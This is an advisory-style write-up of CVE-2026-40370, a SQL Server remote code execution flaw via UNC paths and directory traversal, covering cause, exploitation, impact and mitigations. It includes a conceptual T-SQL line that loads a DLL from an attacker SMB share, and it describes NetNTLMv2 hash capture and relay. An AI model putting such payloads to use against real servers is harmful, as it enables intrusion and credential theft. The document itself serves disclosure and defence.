CVE-2026-40370: Authenticated Remote Code Execution in Microsoft SQL Server via Path Manipulation

CVE-2026-40370 is a critical security flaw identified in Microsoft SQL Server, spanning multiple major releases from 2016 to 2025. The vulnerability facilitates Remote Code Execution (RCE) by authenticated threat actors possessing low-level access privileges. The issue resides within the database engine's handling of file paths supplied as parameters to various internal functions and stored procedures.

The core of the vulnerability is classified under CWE-73 (External Control of File Name or Path). SQL Server provides several mechanisms for interacting with the underlying file system, typically intended for administrative tasks such as backup operations, bulk data imports, or external script execution. When these interfaces fail to sanitize input boundaries, they expose a direct vector for manipulating server-side file operations.

Exploitation of this flaw allows an attacker to dictate the exact file path the SQL Server process will attempt to read, write, or execute. Because the database engine typically runs under a dedicated, highly privileged service account, successful manipulation results in code execution with those elevated permissions, leading to total compromise of the database environment.

The vulnerability materializes when SQL Server processes external input intended for file system operations without applying strict boundary validation or canonicalization. Specific built-in stored procedures or bulk operation functions accept a string parameter representing a file path. The underlying C++ implementation in the SQL Server engine passes this string to Windows API functions without verifying its structural integrity or destination.

This lack of validation permits two distinct path manipulation strategies. First, an attacker can utilize directory traversal sequences to escape intended working directories, potentially overwriting sensitive configuration files or loading malicious libraries from predictable locations. Second, the engine implicitly supports Universal Naming Convention (UNC) paths, which instruct the operating system to resolve the path over the network rather than the local disk.

When a UNC path is provided, the Windows SMB client initiates a network connection to the specified remote host. If the operation involves loading a dynamic-link library or executing a binary, the SQL Server process retrieves the executable payload from the attacker-controlled SMB share and maps it into its own memory space. The root cause is the failure to explicitly block or filter UNC path formats and directory traversal characters at the parameter ingestion phase.

While Microsoft SQL Server is a closed-source application, the vulnerability can be modeled by analyzing the Transact-SQL (T-SQL) attack surface and the underlying Windows API interactions. The flaw is triggered when an attacker invokes a vulnerable procedure and supplies a maliciously crafted parameter.

-- Conceptual representation of the vulnerable T-SQL invocation
-- The attacker supplies a UNC path pointing to an external SMB share
EXEC sys.sp_vulnerable_data_operation 
    @FilePath = '\\192.168.1.50\public\malicious_payload.dll',
    @Action = 'LOAD';

In the vulnerable state, the SQL Server engine extracts the @FilePath variable and executes an internal routine analogous to the LoadLibraryExW Windows API. The operating system resolves the \\192.168.1.50\public share, authenticates using the context of the SQL Server service account, downloads malicious_payload.dll, and executes its entry point (DllMain).

The patched versions introduce strict parameter validation prior to executing file system operations. The remediation logic canonicalizes the input path and verifies it against an authorized list of safe directories (such as the default SQL Server backup or data folders). Furthermore, the update explicitly blocks paths commencing with \\ or containing ..\, terminating the procedure with an error before any network or file handles are opened.

Exploitation of CVE-2026-40370 requires the attacker to possess network connectivity to the SQL Server instance and valid authentication credentials. The prerequisite privilege level is low (PR:L), meaning any standard database user account is sufficient to initiate the attack sequence. No user interaction (UI:N) is required from administrators.

The primary attack vector involves standing up an external, attacker-controlled SMB server hosting the exploitation payload. The attacker logs into the SQL Server environment via standard client tools or an existing application proxy and executes the vulnerable stored procedure. The provided argument points directly to the external SMB share.

Upon execution, the SQL Server service attempts to interact with the specified file. If the payload is an executable or a DLL, it is executed natively. Alternatively, if the file interaction only triggers a read/write operation, the attacker can leverage the outbound SMB connection to capture the NetNTLMv2 hash of the SQL Server service account. This hash can subsequently be cracked offline or relayed to other internal services to achieve lateral movement across the domain.

The impact of CVE-2026-40370 is severe, directly compromising the Confidentiality, Integrity, and Availability (C:H/I:H/A:H) of the host system. Successful exploitation grants the attacker arbitrary code execution privileges matching the SQL Server service account. In typical enterprise deployments, this account operates as NT Service\MSSQLSERVER or a highly privileged Active Directory domain account.

Code execution at this level allows the attacker to bypass database-level access controls completely. The threat actor can directly access the physical database files (.mdf, .ldf), extract sensitive information, modify financial or user data without generating standard database audit logs, or permanently destroy the data. The scope remains unchanged (S:U), as the direct compromise is limited to the host running the SQL instance, though the resultant access is absolute.

Beyond the database, the compromised server serves as a powerful pivot point within the internal network. The attacker can deploy post-exploitation frameworks, initiate network discovery scanning, and target adjacent infrastructure. The outbound SMB connection inherent to the vulnerability also introduces the risk of immediate credential theft via NTLM relay attacks.

Immediate application of the official Microsoft Security Updates is the primary remediation strategy. Microsoft released specific Knowledge Base (KB) articles for all supported SQL Server versions on May 12, 2026. Administrators must identify their specific branch and Cumulative Update (CU) or General Distribution Release (GDR) level to apply the correct patch (e.g., KB5089270 for SQL Server 2016 SP3, KB5089899 for SQL Server 2025).

In environments where immediate patching is unfeasible, administrators should implement stringent network-level workarounds. Configuring host-based firewalls (Windows Defender Firewall) or network perimeter firewalls to block outbound SMB traffic (TCP ports 139 and 445) from the SQL Server instances prevents the primary UNC path exploitation vector. This restricts the database engine from initiating connections to external, unauthenticated shares.

Furthermore, organizations must enforce the Principle of Least Privilege across all database environments. Routine audits should verify that standard users do not possess unnecessary EXECUTE permissions on extended stored procedures or bulk data operations. Restricting the file system permissions of the SQL Server service account can also limit the damage of successful local path traversal, preventing the overwriting of critical system files.